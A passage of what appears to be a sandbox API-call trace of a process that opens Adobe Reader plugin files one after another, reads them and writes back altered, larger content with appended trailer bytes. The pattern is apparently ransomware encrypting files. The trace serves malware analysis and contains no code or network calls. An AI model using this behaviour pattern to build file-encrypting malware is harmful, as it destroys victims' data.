(in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.837] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.837] ReleaseMutex (hMutex=0x168) returned 1 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CAT", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.CAT", cchWideChar=16, lpMultiByteStr=0x1f8867c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.CAT", lpUsedDefaultChar=0x0) returned 16 [0086.838] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0086.882] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.882] WriteFile (in: hFile=0x1f0, lpBuffer=0x2888e18*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2888e18*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0086.883] CloseHandle (hObject=0x1f0) returned 1 [0086.883] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.883] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.884] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0086.884] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.884] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.884] ReleaseMutex (hMutex=0x168) returned 1 [0086.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.ITA", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.ITA", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.ITA", lpUsedDefaultChar=0x0) returned 16 [0086.884] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0086.956] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.957] WriteFile (in: hFile=0x1f0, lpBuffer=0x26673c8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26673c8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0086.957] CloseHandle (hObject=0x1f0) returned 1 [0086.957] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.958] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.958] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0086.958] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.958] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.958] ReleaseMutex (hMutex=0x168) returned 1 [0086.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SVE", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SVE", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.SVE", lpUsedDefaultChar=0x0) returned 16 [0086.958] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.017] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0087.017] WriteFile (in: hFile=0x1f0, lpBuffer=0x2665998*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665998*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.017] CloseHandle (hObject=0x1f0) returned 1 [0087.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\WindowsMedia.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\windowsmedia.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0087.018] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.018] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0087.019] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.019] ReleaseMutex (hMutex=0x168) returned 1 [0087.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.HRV", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.HRV", cchWideChar=16, lpMultiByteStr=0x1f8867c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.HRV", lpUsedDefaultChar=0x0) returned 16 [0087.019] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.064] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0087.064] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.065] CloseHandle (hObject=0x1f0) returned 1 [0087.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\WindowsMedia.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\windowsmedia.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0087.065] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.065] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0087.065] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.066] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.066] ReleaseMutex (hMutex=0x168) returned 1 [0087.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.POL", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.POL", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.POL", lpUsedDefaultChar=0x0) returned 16 [0087.066] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.125] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0087.125] WriteFile (in: hFile=0x1f0, lpBuffer=0x26679c8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26679c8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.125] CloseHandle (hObject=0x1f0) returned 1 [0087.126] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\WindowsMedia.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\windowsmedia.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0087.126] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.126] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0087.126] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.127] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.127] ReleaseMutex (hMutex=0x168) returned 1 [0087.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.RUS", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.RUS", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.RUS", lpUsedDefaultChar=0x0) returned 16 [0087.127] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.128] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0087.128] WriteFile (in: hFile=0x1f0, lpBuffer=0x26679c8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26679c8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.129] CloseHandle (hObject=0x1f0) returned 1 [0087.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\WindowsMedia.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\windowsmedia.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0087.129] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.129] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0087.130] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.130] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.130] ReleaseMutex (hMutex=0x168) returned 1 [0087.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SLV", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SLV", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.SLV", lpUsedDefaultChar=0x0) returned 16 [0087.130] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0087.220] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0087.220] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0087.220] CloseHandle (hObject=0x1f0) returned 1 [0087.220] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\WindowsMedia.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\windowsmedia.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0087.221] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.221] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0087.221] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0087.221] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.221] ReleaseMutex (hMutex=0x168) returned 1 [0087.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.UKR", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.UKR", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.UKR", lpUsedDefaultChar=0x0) returned 16 [0087.222] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.259] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0088.260] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.260] CloseHandle (hObject=0x1f0) returned 1 [0088.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\SendMail.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\sendmail.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0088.261] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0088.261] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x25c63 [0088.261] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0088.261] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.262] ReleaseMutex (hMutex=0x168) returned 1 [0088.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.api", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.api", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.api", lpUsedDefaultChar=0x0) returned 12 [0088.262] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0088.331] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x24c63 [0088.332] ReadFile (in: hFile=0x1f0, lpBuffer=0x2666398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2666398*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x24c63 [0088.432] WriteFile (in: hFile=0x1f0, lpBuffer=0x2666398*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666398*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0088.433] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0088.433] CloseHandle (hObject=0x1f0) returned 1 [0088.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvSOFT.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvsoft.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0088.814] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0088.815] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x35190 [0088.815] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0088.815] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.815] ReleaseMutex (hMutex=0x168) returned 1 [0088.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drvSOFT.x3d", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0088.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drvSOFT.x3d", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="drvSOFT.x3d", lpUsedDefaultChar=0x0) returned 11 [0088.815] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0088.884] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x34190 [0088.884] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.972] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x34190 [0088.973] WriteFile (in: hFile=0x1fc, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.973] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0088.973] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: 